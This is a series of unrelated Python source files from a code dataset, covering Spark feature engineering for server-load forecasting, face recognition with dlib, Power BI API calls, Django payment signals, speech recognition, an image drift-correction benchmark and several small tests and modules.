info = {"trainBegin":trainBegin, "trainEnd": trainEnd, "testSplitStart": testSplitStart, "dataFile": dataFile, "duration": duration}
if duration == 'FULL':
trainBegin = '2009-01-01 00:00:00'
trainEnd = '2016-06-30 23:59:59'
testSplitStart = '2016-06-01 00:00:00'
info = {"trainBegin":trainBegin, "trainEnd": trainEnd, "testSplitStart": testSplitStart, "dataFile": dataFile, "duration": duration}
# start Spark session
spark = pyspark.sql.SparkSession.builder.appName('etl').getOrCreate()
def attach_storage_container(spark, account, key):
config = spark._sc._jsc.hadoopConfiguration()
setting = "fs.azure.account.key." + account + ".blob.core.windows.net"
if not config.get(setting):
config.set(setting, key)
# attach the blob storage to the spark cluster or VM so that the storage can be accessed by the cluste or VM
attach_storage_container(spark, storageAccount, storageKey)
# print runtime versions
print ('****************')
print ('Python version: {}'.format(sys.version))
print ('Spark version: {}'.format(spark.version))
print(spark.sparkContext.getConf().getAll())
print ('****************')
# load csv files in blob storage into Spark dataframe
# import time
print(time.time())
dataFileSep = ','
print(dataFile)
run_logger.log("reading file from ", dataFile)
df = spark.read.csv(dataFile, header=False, sep=dataFileSep, inferSchema=True, nanValue="", mode='PERMISSIVE')
print(time.time())
# rename the columns
oldnames = df.columns
newColumns=['TrafficType',"SessionStart","SessionEnd", "ConcurrentConnectionCounts", "MbytesTransferred",
"ServiceGrade","HTTP1","ServerType",
"SubService_1_Load","SubSerivce_2_Load", "SubSerivce_3_Load",
"SubSerivce_4_Load", "SubSerivce_5_Load", "SecureBytes_Load", "TotalLoad", 'ServerIP', 'ClientIP']
newdf = df.select([col(oldnames[index]).alias(newColumns[index]) for index in range(0,len(oldnames))])
if DEBUG == "FILTER_IP":
IPList={'172.16.17.32','192.168.3.11'}
filterdf = newdf.filter(newdf["ServerIP"].isin(IPList) == True)
newdf = filterdf
# add per five minutes feature
seconds = 300
seconds_window = F.from_unixtime(F.unix_timestamp('SessionStart') - F.unix_timestamp('SessionStart') % seconds)
newdf = newdf.withColumn('SessionStartFiveMin', seconds_window.cast('timestamp'))
# aggreagte per five minutes
newdf.createOrReplaceTempView("newdf")
sqlStatement = """
SELECT ServerIP, SessionStartFiveMin ,
sum(TotalLoad) SumTotalLoad, count(*) NumSession,
sum(MbytesTransferred) SumMBytes,
sum(SubService_1_Load) SumLoad1, sum(SubSerivce_2_Load) SumLoad2, sum(SubSerivce_3_Load) SumLoad3,
sum(SubSerivce_4_Load) SumLoad4, sum(SubSerivce_5_Load) SumLoad5, sum(SecureBytes_Load) SumLoadSecure
FROM newdf group by ServerIP, SessionStartFiveMin
"""
aggregatedf = spark.sql(sqlStatement);
aggregatedf.cache()
#########################
#Create the time series for per-five minutes buckets
# UDF
def generate_date_series(start, stop, window=300):
begin = start - start%window
end = stop - stop%window + window
return [begin + x for x in range(0, end-begin + 1, window)]
# Register UDF for later usage
spark.udf.register("generate_date_series", generate_date_series, ArrayType(IntegerType()) )
sqlStatement = """ SELECT explode( generate_date_series( UNIX_TIMESTAMP('{0!s}', "yyyy-MM-dd HH:mm:ss"),
UNIX_TIMESTAMP('{1!s}', 'yyyy-MM-dd HH:mm:ss')) )
""".format(info['trainBegin'], info['trainEnd'])
timeDf = spark.sql(sqlStatement)
timeDf=timeDf.withColumn("Time", col('col').cast(TimestampType()))
numRowsinTimeDF=timeDf.count()
run_logger.log("numRowsinTimeDF", numRowsinTimeDF)
timeDf.persist()
##########################
# join the timeDf to form dataframe with each per-five-minute bucket filled with proper data or null
joindf = timeDf.join(aggregatedf, aggregatedf.SessionStartFiveMin==timeDf.Time, "outer")
# add hour feature
secondsInHour = 3600
hour_window = F.from_unixtime(F.unix_timestamp('SessionStartFiveMin') - F.unix_timestamp('SessionStartFiveMin') % secondsInHour)
joindf = joindf.withColumn('SessionStartHourTime', hour_window.cast('timestamp'))
#aggregatedf = aggregatedf.withColumn('SessionStartHourTime', col('SessionStartHour').cast('timestamp'))
joindf = joindf.withColumn("key", concat(joindf.ServerIP,lit("_"),joindf.SessionStartHourTime.cast('string')))
joindf.cache()
joindf = joindf.fillna(0, subset=['SumTotalLoad'])
# get the peakload every five minutes (non-overlapping) per hour
maxByGroup = (joindf.rdd
.map(lambda x: (x[-1], x)) # Convert to PairwiseRD
# Take maximum of the passed arguments by the last element (key)
# equivalent to:
# lambda x, y: x if x[-1] > y[-1] else y
# 4 is the SumTotalLoad
.reduceByKey(lambda x1, x2: max(x1, x2, key=lambda x: x[4]))
.values()) # Drop keys
aggregatemaxdf = maxByGroup.toDF()
featureeddf = None
aggregatemaxdf.createOrReplaceTempView("aggregatemaxdf")
sqlStatement = """
SELECT key, ServerIP, SessionStartHourTime,
SumTotalLoad peakLoad,
SumMBytes peakBytes,
SumLoad1 peakLoad1, SumLoad2 peakLoad2, SumLoad3 peakLoad3,
SumLoad4 peakLoad4, SumLoad5 peakLoad5, SumLoadSecure peakLoadSecure
FROM aggregatemaxdf
"""
featureeddf = spark.sql(sqlStatement);
############################################
# Extract some time features from "SessionStartHourTime" column
featureeddf = featureeddf.withColumn('year', year(featureeddf['SessionStartHourTime']))
featureeddf = featureeddf.withColumn('month', month(featureeddf['SessionStartHourTime']))
featureeddf = featureeddf.withColumn('weekofyear', weekofyear(featureeddf['SessionStartHourTime']))
featureeddf = featureeddf.withColumn('dayofmonth', dayofmonth(featureeddf['SessionStartHourTime']))
featureeddf = featureeddf.withColumn('hourofday', hour(featureeddf['SessionStartHourTime']))
dayofweek = F.date_format(featureeddf['SessionStartHourTime'], 'EEEE')
featureeddf = featureeddf.withColumn('dayofweek', dayofweek )
# add day feature
day = 3600*24
day_window = F.from_unixtime(F.unix_timestamp('SessionStartHourTime') - F.unix_timestamp('SessionStartHourTime') % day)
featureeddf = featureeddf.withColumn('SessionStartDay', day_window)
# aggreagte daily
featureeddf.createOrReplaceTempView("featureeddf")
sqlStatement = """
SELECT ServerIP d_ServerIP, SessionStartDay d_SessionStartDay,
AVG(peakLoad) peakLoadDaily,
AVG(peakBytes) peakBytesDaily,
AVG(peakLoad1) peakLoad1Daily, AVG(peakLoad2) peakLoad2Daily, AVG(peakLoad3) peakLoad3Daily,
AVG(peakLoad4) peakLoad4Daily, AVG(peakLoad5) peakLoad5Daily, AVG(peakLoadSecure) peakLoadSecureDaily
FROM featureeddf group by ServerIP, SessionStartDay
"""
dailyStatisticdf = spark.sql(sqlStatement);
#lag features
#previous week average
#rolling mean features with 2-days/48-hours lag
rollingLags = [2]
lagColumns = [x for x in dailyStatisticdf.columns if 'Daily' in x]
windowSize=[7]
for w in windowSize:
for i in rollingLags:
wSpec = Window.partitionBy('d_ServerIP').orderBy('d_SessionStartDay').rowsBetween(-i-w, -i-1)
for j in lagColumns:
dailyStatisticdf = dailyStatisticdf.withColumn(j+'Lag'+str(i)+'Win'+str(w),F.avg(col(j)).over(wSpec) )
selectColumn = ['d_ServerIP', 'd_SessionStartDay']
selectColumn.extend([x for x in dailyStatisticdf.columns if 'Lag' in x])
dailyStatisticdf = dailyStatisticdf.select(selectColumn)
dailyStatisticdf = dailyStatisticdf.withColumn("d_key2", concat(dailyStatisticdf.d_ServerIP,lit("_"),dailyStatisticdf.d_SessionStartDay.cast('string')))
featureeddf = featureeddf.withColumn("d_key2", concat(featureeddf.ServerIP,lit("_"),featureeddf.SessionStartDay.cast('string')))
dailyStatisticdf.cache()
# Single column join is much faster than two columns join
featureeddf = featureeddf.join(dailyStatisticdf, (featureeddf.d_key2 == dailyStatisticdf.d_key2),
'outer' )
featureeddf.show(1)
featureeddf.persist()
featureeddf = featureeddf.select([x for x in featureeddf.columns if 'd_' not in x ])
################################
trainBeginTimestamp = int(datetime.datetime.strftime( datetime.datetime.strptime(info['trainBegin'], "%Y-%m-%d %H:%M:%S") ,"%s"))
def linearTrend(x):
if x is None:
return 0
# return # of hour since the beginning
return (x-trainBeginTimestamp)/3600/24/365.25
#
linearTrendUdf = udf(linearTrend,IntegerType())
featureeddf = featureeddf.withColumn('linearTrend',linearTrendUdf(F.unix_timestamp('SessionStartHourTime')))
# use the following two as the range to calculate the holidays in the range of [holidaBegin, holidayEnd ]
holidayBegin = '2009-01-01'
holidayEnd='2016-06-30'
cal = USFederalHolidayCalendar()
holidays_datetime = cal.holidays(start=holidayBegin, end=holidayEnd).to_pydatetime()
holidays = [t.strftime("%Y-%m-%d") for t in holidays_datetime]
def isHoliday(x):
if x is None:
return 0
if x in holidays:
return 1
else:
return 0
isHolidayUdf = udf (isHoliday, IntegerType())
featureeddf= featureeddf.withColumn('date', date_format(col('SessionStartHourTime'), 'yyyy-MM-dd'))
featureeddf = featureeddf.withColumn("Holiday",isHolidayUdf('date'))
#featureeddf.select(['date', 'Holiday'],).dropDuplicates().orderBy('date').show(20)
def isBusinessHour(x):
if x is None:
return 0
if x >=8 and x <=18:
return 1
else:
return 0
isBusinessHourUdf = udf (isBusinessHour, IntegerType())
featureeddf = featureeddf.withColumn("BusinessHour",isBusinessHourUdf('hourofday'))
def isMorning(x):
if x is None:
return 0
if x >=6 and x <=9:
return 1
else:
return 0
isMorningUdf = udf (isMorning, IntegerType())
featureeddf = featureeddf.withColumn("Morning",isMorningUdf('hourofday'))
dfLen = featureeddf.count()
featureeddf.persist()
###############################
# lag features
previousWeek=int(24*7)
previousMonth=int(24*365.25/12)
lags=[48, 49, 50, 51, 52, 55, 60, 67, 72, 96]
lags.extend([previousWeek, previousMonth])
lagColumns = ['peakLoad']
for i in lags:
wSpec = Window.partitionBy('ServerIP').orderBy('SessionStartHourTime')
for j in lagColumns:
featureeddf = featureeddf.withColumn(j+'Lag'+str(i),lag(featureeddf[j], i).over(wSpec) )
mlSourceDF = featureeddf
mlSourceDF.printSchema()
mlSourceDF=mlSourceDF.fillna(0, subset= [x for x in mlSourceDF.columns if 'Lag' in x])
# after creating all lag features, we can drop NA columns on the key columns
# drop na to avoid error in StringIndex
mlSourceDF = mlSourceDF.na.drop(subset=["ServerIP","SessionStartHourTime"])
# indexing
columnsForIndex = ['dayofweek', 'ServerIP', 'year', 'month', 'weekofyear', 'dayofmonth', 'hourofday',
'Holiday', 'BusinessHour', 'Morning']
mlSourceDF=mlSourceDF.fillna(0, subset= [x for x in columnsForIndex ])
sIndexers = [StringIndexer(inputCol=x, outputCol=x + '_indexed').setHandleInvalid("skip") for x in columnsForIndex]
indexModel = Pipeline(stages=sIndexers).fit(mlSourceDF)
mlSourceDF = indexModel.transform(mlSourceDF)
# save model for operationalization
indexModel.write().overwrite().save(stringIndexModelFile)
# encoding for categorical features
catVarNames=[x + '_indexed' for x in columnsForIndex ]
columnOnlyIndexed = [ catVarNames[i] for i in range(0,len(catVarNames)) if len(indexModel.stages[i].labels)<2 ]
columnForEncode = [ catVarNames[i] for i in range(0,len(catVarNames)) if len(indexModel.stages[i].labels)>=2 ]
info['columnOnlyIndexed'] = columnOnlyIndexed
info['columnForEncode'] = columnForEncode
# save info to blob storage
write_blob(info, infoFile, storageContainer, storageAccount, storageKey)
ohEncoders = [OneHotEncoder(inputCol=x, outputCol=x + '_encoded')
for x in columnForEncode ]
ohPipelineModel = Pipeline(stages=ohEncoders).fit(mlSourceDF)
mlSourceDFCat = ohPipelineModel.transform(mlSourceDF)
ohPipelineModel.write().overwrite().save(oneHotEncoderModelFile)
# feature scaling for numeric features
featuresForScale = [x for x in mlSourceDFCat.columns if 'Lag' in x]
print(len(featuresForScale))
assembler = VectorAssembler(
inputCols=featuresForScale, outputCol="features"
)
assembled = assembler.transform(mlSourceDFCat).select(col('key'), col('features'))
scaler = StandardScaler(
inputCol="features", outputCol="scaledFeatures",
withStd=True, withMean=False
).fit(assembled)
scaler.write().overwrite().save(featureScaleModelFile)
scaledData = scaler.transform(assembled).select('key','scaledFeatures')
def extract(row):
return (row.key, ) + tuple(float(x) for x in row.scaledFeatures.values)
rdd = scaledData.rdd.map(lambda x: Row(key=x[0],scaledFeatures=DenseVector(x[1].toArray())))
scaledDf = rdd.map(extract).toDF(["key"])
# rename columns
oldColumns = scaledDf.columns
scaledColumns = ['scaledKey']
scaledColumns.extend(['scaled'+str(i) for i in featuresForScale])
scaledOutcome = scaledDf.select([col(oldColumns[index]).alias(scaledColumns[index]) for index in range(0,len(oldColumns))])
noScaledMLSourceDF = mlSourceDFCat.select([column for column in mlSourceDFCat.columns if column not in featuresForScale])
newDF = noScaledMLSourceDF.join(scaledOutcome, noScaledMLSourceDF.key==scaledOutcome.scaledKey, 'outer')
newDF.cache()
mlSourceDFCat = newDF
mlSourceDFCat=mlSourceDFCat.fillna(0, subset= [x for x in mlSourceDFCat.columns if 'Lag' in x])
mlSourceDFCat=mlSourceDFCat.fillna(0, subset= ['linearTrend'])
## save the intermediate result for downstream work
mlSourceDFCat.write.mode('overwrite').parquet(mlSourceDFFile)
#spark.stop()
| StarcoderdataPython |
4813536 | import json
from storyhub.sdk.service.Argument import Argument
from storyhub.sdk.service.HttpOptions import HttpOptions
from storyhub.sdk.service.output.OutputAction import OutputAction
from tests.storyhub.sdk.JsonFixtureHelper import JsonFixtureHelper
output_action_fixture = JsonFixtureHelper.load_fixture("output_action_fixture")
output_action_fixture_json = json.dumps(output_action_fixture)
def test_deserialization(mocker):
mocker.patch.object(json, "loads", return_value=output_action_fixture)
mocker.patch.object(HttpOptions, "from_dict")
mocker.patch.object(Argument, "from_dict")
assert (
OutputAction.from_json(jsonstr=output_action_fixture_json) is not None
)
json.loads.assert_called_with(output_action_fixture_json)
HttpOptions.from_dict.assert_called_with(
data={"http_options": output_action_fixture["output_action"]["http"]}
)
Argument.from_dict.assert_called_with(
data={
"name": "flush",
"argument": output_action_fixture["output_action"]["arguments"][
"flush"
],
}
)
def test_serialization(mocker):
mocker.patch.object(json, "dumps", return_value=output_action_fixture_json)
service_event = OutputAction.from_dict(data=output_action_fixture)
assert service_event.as_json(compact=True) is not None
json.dumps.assert_called_with(output_action_fixture, sort_keys=True)
assert service_event.as_json() is not None
json.dumps.assert_called_with(
output_action_fixture, indent=4, sort_keys=True
)
def test_getters(mocker):
output_action = OutputAction.from_json(jsonstr=output_action_fixture_json)
assert output_action.help() == "No help available."
| StarcoderdataPython |
3295790 | # -*- coding: UTF-8 -*-
import sys,os,dlib,glob,numpy
from skimage import io
import cv2
import imutils
import php
my = php.kit()
if len(sys.argv) != 2:
print("缺少要辨識的圖片名稱")
exit()
# 人臉68特徵點模型路徑
predictor_path = "shape_predictor_68_face_landmarks.dat"
# 人臉辨識模型路徑
face_rec_model_path = "dlib_face_recognition_resnet_model_v1.dat"
# 比對人臉圖片資料夾名稱
faces_folder_path = "./rec/pic"
# 比對人臉解算資料夾名稱
faces_numpy_folder_path = "./rec/numpy"
# 需要辨識的人臉圖片名稱
img_path = sys.argv[ 1]
# 載入人臉檢測器
detector = dlib.get_frontal_face_detector()
# 載入人臉特徵點檢測器
sp = dlib.shape_predictor(predictor_path)
# 載入人臉辨識檢測器
facerec = dlib.face_recognition_model_v1(face_rec_model_path)
# 比對人臉描述子列表
descriptors = []
# 比對人臉名稱列表
candidate = []
# 針對比對資料夾裡每張圖片做比對:
# 1.人臉偵測
# 2.特徵點偵測
# 3.取得描述子
for f in my.glob(faces_numpy_folder_path+"\\*.npy"):
base = os.path.basename(f)
# 依序取得圖片檔案人名
candidate.append(os.path.splitext(base)[ 0])
# from : https://ithelp.ithome.com.tw/articles/10196167
v = numpy.load(f)
descriptors.append(v)
# 針對需要辨識的人臉同樣進行處理
img = io.imread(img_path)
dets = detector(img, 1)
dist = []
for k, d in enumerate(dets):
shape = sp(img, d)
face_descriptor = facerec.compute_face_descriptor(img, shape)
#print(face_descriptor);
#print(dir(face_descriptor))
#sys.exit()
d_test = numpy.array(face_descriptor)
x1 = d.left()
y1 = d.top()
x2 = d.right()
y2 = d.bottom()
# 以方框標示偵測的人臉
cv2.rectangle(img, (x1, y1), (x2, y2), ( 0, 255, 0), 4, cv2. LINE_AA)
# 計算歐式距離
for i in descriptors:
dist_ = numpy.linalg.norm(i -d_test)
dist.append(dist_)
# 將比對人名和比對出來的歐式距離組成一個dict
c_d = dict( zip(candidate,dist))
#dir(c_d)
#print(dir(c_d))
#print(c_d)
#sys.exit()
# 根據歐式距離由小到大排序
#cd_sorted = sorted(c_d.iteritems(), key = lambda d:d[ 1])
cd_sorted = sorted(c_d.items(), key=lambda kv: kv[1])
# 取得最短距離就為辨識出的人名
rec_name = cd_sorted[ 0][ 0]
# 將辨識出的人名印到圖片上面
cv2.putText(img, rec_name, (x1, y1), cv2. FONT_HERSHEY_SIMPLEX , 1, ( 255, 255, 255), 2, cv2. LINE_AA)
img = imutils.resize(img, width = 600)
img = cv2.cvtColor(img,cv2. COLOR_BGR2RGB)
cv2.imshow( "Face Recognition", img)
#隨意Key一鍵結束程式
cv2.waitKey( 0)
cv2.destroyAllWindows() | StarcoderdataPython |
3359713 | <filename>Python/Encrypt credentials/Encryption sample/services/getdatasource.py
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import requests
class GetDatasourceService:
headers = None
def get_datasources_in_group(self, access_token, group_id, dataset_id):
''' Returns all the data sources from the given group
Args:
access_token (str): Access token to call API
group_id (str): Group Id
dataset_id (str): Dataset Id
Returns:
Response: Response from the API call
'''
self.headers = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + access_token}
# https://docs.microsoft.com/en-us/rest/api/power-bi/datasets/getdatasourcesingroup
endpoint_url = f'https://api.powerbi.com/v1.0/myorg/groups/{group_id}/datasets/{dataset_id}/datasources'
api_response = requests.get(endpoint_url, headers=self.headers)
return api_response
def get_gateway(self, access_token, gateway_id):
''' Returns the gateway information
Args:
access_token (str): Access token to call API
gateway_id (str): Gateway Id
Returns:
Response: Response from the API call
'''
self.headers = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + access_token}
endpoint_url = f'https://api.powerbi.com/v1.0/myorg/gateways/{gateway_id}'
api_response = requests.get(endpoint_url, headers=self.headers)
return api_response
| StarcoderdataPython |
180793 | import math
import torch
from HyperSphere.BO.utils.normal_cdf import norm_cdf
def norm_pdf(x, mu=0.0, var=1.0):
return torch.exp(-0.5 * (x-mu) ** 2 / var)/(2 * math.pi * var)**0.5
def expected_improvement(mean, var, reference):
std = torch.sqrt(var)
standardized = (-mean + reference) / std
return (std * norm_pdf(standardized) + (-mean + reference) * norm_cdf(standardized)).clamp(min=0)
if __name__ == '__main__':
import matplotlib.pyplot as plt
from scipy.stats import norm
x = torch.linspace(2, 3, 200)
y1 = norm_cdf(x)
y2 = norm.cdf(x.numpy())
plt.plot(x.numpy(), y1.numpy(), label='approximate')
plt.plot(x.numpy(), y2, ':', label='exact')
z1 = norm_pdf(x)
z2 = norm.pdf(x.numpy())
plt.plot(x.numpy(), z1.numpy(), label='approximate')
plt.plot(x.numpy(), z2, ':', label='exact')
plt.legend()
plt.show()
| StarcoderdataPython |
1738443 | <reponame>Paradigm-shift-AI/paradigm-brain
import requests
import os
class SequenceRearrange:
"""
SequenceRearrange
Class that create SequenceRearrange question, it use the sequence defined in
the plugin and the intersection of the tags discovered in the transcript to
create the question
Arguments:
processed_transcript: dict
"""
def __init__(self, processed_transcript: list, tokenid: str = None):
"""
__init__
Arguments:
processed_transcript: dict
"""
self.processed_transcript = processed_transcript
self.question = []
self.tokenid = tokenid
def __generate_question(self):
_req = requests.get(os.environ["PLUGIN_STORE_URL"] + self.tokenid + '/seq')
if _req.status_code == 200:
for i in _req.json()['seq']:
_gh = True
for j in i:
if j not in self.processed_transcript["tag-intersection"]:
_gh = False
break;
if _gh:
_ques = {}
_inde = 1
for j in i:
_ques['option' + str(_inde)] = j
_inde += 1
_ques['score'] = len(i)
_ques['type'] = 5
self.question.append(_ques)
def questions(self):
"""
Returns question in the following format:
{
option1: <>,
option2: <>,
option3: <>,
score: 3,
type: 5
}
"""
if self.tokenid:
self.__generate_question()
return self.question
| StarcoderdataPython |
4805361 | from zabbix_enums.common import _ZabbixEnum
class TaskType(_ZabbixEnum):
DIAGNOSTIC = 1
CHECK_NOW = 6
class TaskStatus(_ZabbixEnum):
NEW = 1
IN_PROGRESS = 2
COMPLETED = 3
EXPIRED = 4
class TaskStatisticResult(_ZabbixEnum):
ERROR = -1
CREATED = 0
| StarcoderdataPython |
3252711 | from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from products.models import Product
from sales.models import SaleItem, Payment, Sale, Shipping
# sale = models.OneToOneField(Sale, on_delete=models.CASCADE)
# amount = models.PositiveIntegerField(default=0)
# payment_type = models.CharField(max_length=100, default=TYPE_BANK_TRANSFER, choices=PAYMENT_TYPES)
# is_paid = models.BooleanField(default=False)
# note = models.TextField()
def update_payment(sale):
payment = Payment.objects.get(sale=sale)
payment.amount = sale.total()
payment.save()
def create_payment(sale):
Payment.objects.create(
sale=sale,
is_paid=False,
amount=sale.total()
)
@receiver(post_save, sender=Sale)
def save_sale(sender, instance, created, **kwargs):
print('Invoke save_sale')
if created:
create_payment(instance)
else:
update_payment(instance)
@receiver(post_save, sender=SaleItem)
def save_saleitem(sender, instance, created, **kwargs):
update_payment(instance.sale)
@receiver(post_save, sender=Shipping)
def save_shipping(sender, instance, created, **kwargs):
# print(instance.sale)
update_payment(instance.sale)
| StarcoderdataPython |
4803567 | <reponame>thagusta/LEEM-analysis
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 3 - Benchmarking
# This notebook explores the performance of the driftcorrection algorithm as defined in `2 - Driftcorrection` by benchmarking the time it takes to driftcorrect stacks of different numbers of images.
# Needed imports
from Registration import *
import shutil
import xarray as xr
import time
from dask.distributed import Client, LocalCluster
import matplotlib.pyplot as plt
import os
import scipy.ndimage as ndi
folder = r'./data'
name = '20171120_160356_3.5um_591.4_IVhdr'
original = xr.open_dataset(os.path.join(folder, name + '_detectorcorrected.nc'), chunks={'time': 1})
original = original.Intensity.data
# Define fftsize used for the drift correction algorithm; actual size of the fft is twice this value.
fftsize = 256 // 2
# Next, we define the grid of parameters for which we will perform the benchmark and the timings we want to save as an empty `xarray.DataArray`.
#
# **Note**: the parameters noted here will run for several hours at least even on reasonably fast hardware.
iters = np.arange(5)
sigmas = [3, 7, 9, 11, 13, 17]
#strides = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 20, 35, 50, 70,])
strides = np.array([35, 50, 70,])
ts = [0,1,2,3,4]
res = xr.DataArray(np.zeros((len(iters), len(sigmas), len(strides), len(ts))),
coords={'i':iters, 'sigma': sigmas, 'strides': strides.astype(np.int32), 't': ts},
dims=['i','sigma', 'strides', 't'])
res.coords
# Before we can start, we connect to the dask-scheduler and upload the used functions
cluster = LocalCluster()
client = Client(cluster)
client.upload_file('Registration.py')
client
# Inferring output dtype is not supported in dask yet, so we need original.dtype here.
@da.as_gufunc(signature="(i,j),(2)->(i,j)", output_dtypes=original.dtype, vectorize=True)
def shift_images(image, shift):
"""Shift `image` by `shift` pixels."""
return ndi.shift(image, shift=shift, order=1)
tstart = time.time()
t = np.zeros((5,))
for stride in strides:
for sigma in sigmas:
for i in iters:
t[0] = time.time() - tstart
#start, stride, dE = 40, 1, 10
start, stop, dE = 40, 740, 10
#stop = start + n
Eslice = slice(start, stop, stride)
sliced_data = original[Eslice,...].rechunk({0:dE})
sobel = crop_and_filter(sliced_data,
sigma=sigma, finalsize=2*fftsize)
sobel = sobel - sobel.mean(axis=(1,2), keepdims=True)
Corr = dask_cross_corr(sobel)
weights, argmax = max_and_argmax(Corr)
W, DX_DY = calculate_halfmatrices(weights, argmax, fftsize=fftsize)
t[1] = (time.time() - (t[0]+tstart))
coords = np.arange(sliced_data.shape[0])
coords, weightmatrix, DX, DY, row_mask = threshold_and_mask(0.0, W, DX_DY, coords=coords)
t[2] = (time.time() - (t[0]+tstart))
dx, dy = calc_shift_vectors(DX, DY, weightmatrix)
t[3] = (time.time() - (t[0]+tstart))
shifts = np.stack(interp_shifts(coords, [dx, dy], n=sliced_data.shape[0]), axis=1)
neededMargins = np.ceil(shifts.max(axis=0)).astype(int)
shifts = da.from_array(shifts, chunks=(dE,-1))
padded = da.pad(sliced_data,
((0, 0),
(0, neededMargins[0]),
(0, neededMargins[1])
),
mode='constant'
)
corrected = shift_images(padded.rechunk({1:-1, 2:-1}), shifts)
corrected[:sliced_data.shape[0]].to_zarr(r'./tempresult.zarr', overwrite=True)
t[4] = (time.time() - (t[0]+tstart))
res.loc[dict(i=i,sigma=sigma,strides=stride)] = t
shutil.rmtree(r'tempresult.zarr')
print(f"t_tot = {t[0]:.2f}\nn = {corrected.shape[0]}, times = {t[1:]}")
res.to_netcdf(os.path.join(folder, 'benchmarkresult.nc'))
# ## Plotting
# We can plot the results of either the benchmark run above or the reference results. This is done using `xarray` plotting interface on the created datasets. First we do some cleaning up of the data and recombination:
data = xr.open_dataarray(os.path.join(folder, 'benchmarkresult_reference.nc')) # One can remove _reference to view newly generated results
data
# +
# We are interested in the times each individual step took,
# instead of the time upto that step which is saved, so take a diff
data = xr.concat([data.isel(t=1), data.isel(t=slice(2,5)).diff(dim='t', label='lower'), data.isel(t=4)], 't')
data.attrs['long_name'] = 'Run time'
data.attrs['units'] = 's'
# Define a nicer 'Phase' of the algorithm dimension instead of 't', as it is saved in the file.
data.coords['Phase'] = ('t', ['Filter+CC', 'Least Squares', 'Shift and write', 'Total'])
data = data.swap_dims({'t': 'Phase'})
data.coords['N'] = ('strides', 700//data.coords['strides'])
data = data.swap_dims({'strides': 'N'})
# -
# And now we are ready to actually plot.
# +
#Take the mean over the iterations
red = data.mean(dim='i', keep_attrs=True)
facetgrid = red.plot.line('.', col='Phase', hue='sigma',
yscale='log', xscale='log', ylim=[0.1, 1000],
figsize=[6,2], alpha=0.8)
# Add guidelines in red for quadratic in green for linear.
facetgrid.axes[0,0].plot(data['N'], 0.0012*data['N']**2, c='red', zorder=0, alpha=0.5)
facetgrid.axes[0,1].plot(data['N'], 0.00025*data['N']**2, c='red', zorder=0, alpha=0.5)
facetgrid.axes[0,1].plot(data['N'], 0.0035*data['N'], c='green', zorder=0, alpha=0.5)
facetgrid.axes[0,2].plot(data['N'], 0.02*data['N'], c='green', zorder=0, alpha=0.5)
facetgrid.axes[0,3].plot(data['N'], 0.0012*data['N']**2, c='red', zorder=0, alpha=0.5)
# Replace default plot titles with a somewhat nicer version
facetgrid.axes[0,0].set_title('Phase:\nFilter & CC')
facetgrid.axes[0,1].set_title('Phase:\nLeast Squares')
facetgrid.axes[0,2].set_title('Phase:\nShift & write')
facetgrid.axes[0,3].set_title('Total')
plt.subplots_adjust(top=0.8, bottom=0.18, left=0.08, wspace=0.1)
#plt.savefig('timebench.pdf')
# -
| StarcoderdataPython |
1727162 | import logging
from unittest import TestCase
from tests.utils.hvac_integration_test_case import HvacIntegrationTestCase
class TestInit(HvacIntegrationTestCase, TestCase):
def test_read_init_status(self):
read_response = self.client.sys.read_init_status()
logging.debug("read_response: %s" % read_response)
self.assertTrue(expr=read_response["initialized"])
| StarcoderdataPython |
1645821 | <reponame>mustious/iGlass-infinity
import speech_recognition as sr
import os
project_root_path = os.path.abspath(os.path.dirname(__file__))
beep_tone_path = os.path.join(project_root_path, ".tones/beep_ping.wav")
google_keys_path = os.environ.get("google_keys_path")
# checks whether the environment variable value is valid and path exists
google_json_path_exists = isinstance(google_keys_path, str) and os.path.exists(google_keys_path)
if google_json_path_exists:
with open(google_keys_path) as key_json:
google_key = key_json.read()
class SpeechRecognizer:
"""
This module triggers the microphone to accept speech then uses the google api to transcribe it
if google api is not available it uses the wit.ai api
:ivar recognise: instance of the Recognizer() class from the speech-recognition library
:ivar mic: instance of the Microphone() class
"""
def __init__(self):
self.recognise = sr.Recognizer()
self.mic = sr.Microphone()
def beep_sound(self):
"""
adds a beep tone to signify iGlass is waiting for command
"""
try:
if os.path.exists(beep_tone_path):
os.system(f"aplay {beep_tone_path}")
except:
pass
def listen(self):
"""
triggers the mic, coverts audio to text
:var response_google: text string from google cloud speech-to-text
:return: response
:rtype dict
"""
response = {"success": None,
"error": None}
self.beep_sound()
with self.mic as source:
self.recognise.adjust_for_ambient_noise(source) # reduces noise
voice = self.recognise.listen(source)
try:
if google_json_path_exists:
response_google_cloud = self.recognise.recognize_google_cloud(audio_data=voice, credentials_json=google_key)
response["success"] = response_google_cloud
return response
response_google = self.recognise.recognize_google(audio_data=voice)
response["success"] = response_google
return response
except sr.RequestError:
# network related error
response["fail"] = "Request error please try again"
return response
except sr.UnknownValueError:
"""
occurs when there is silence in speech
this returns a None value which is neglected by the Brain instance
"""
response["fail"] = "Unknown Value Error"
return response
| StarcoderdataPython |
175094 | import utils
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from modules.transformer import TransformerEncoder
class ClassEmbedding(nn.Module):
def __init__(self, cfg, trainable=True):
super(ClassEmbedding, self).__init__()
idx2vocab = utils.load_files(cfg["DATASET"]["IDX2VOCAB"])
self.n_token = len(idx2vocab)
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.emb = nn.Embedding(self.n_token, self.word_emb_size)
weight_init = utils.load_files(cfg["DATASET"]["GLOVE"]).astype(np.float32)
weight_mat = torch.from_numpy(weight_init)
self.emb.load_state_dict({"weight": weight_mat})
if not trainable:
self.emb.weight.requires_grad = False
def forward(self, x):
emb = self.emb(x)
return emb
class AnswerSelector(nn.Module):
def __init__(self, cfg):
super(AnswerSelector, self).__init__()
self.av2i = utils.load_files(cfg["DATASET"]["AVOCAB2IDX"])
self.len_avocab = len(self.av2i)
self.glove_cands = utils.load_files(cfg["DATASET"]["GLOVE_ANS_CAND"]).astype(
np.float32
)
self.glove_cands = torch.from_numpy(self.glove_cands).cuda()
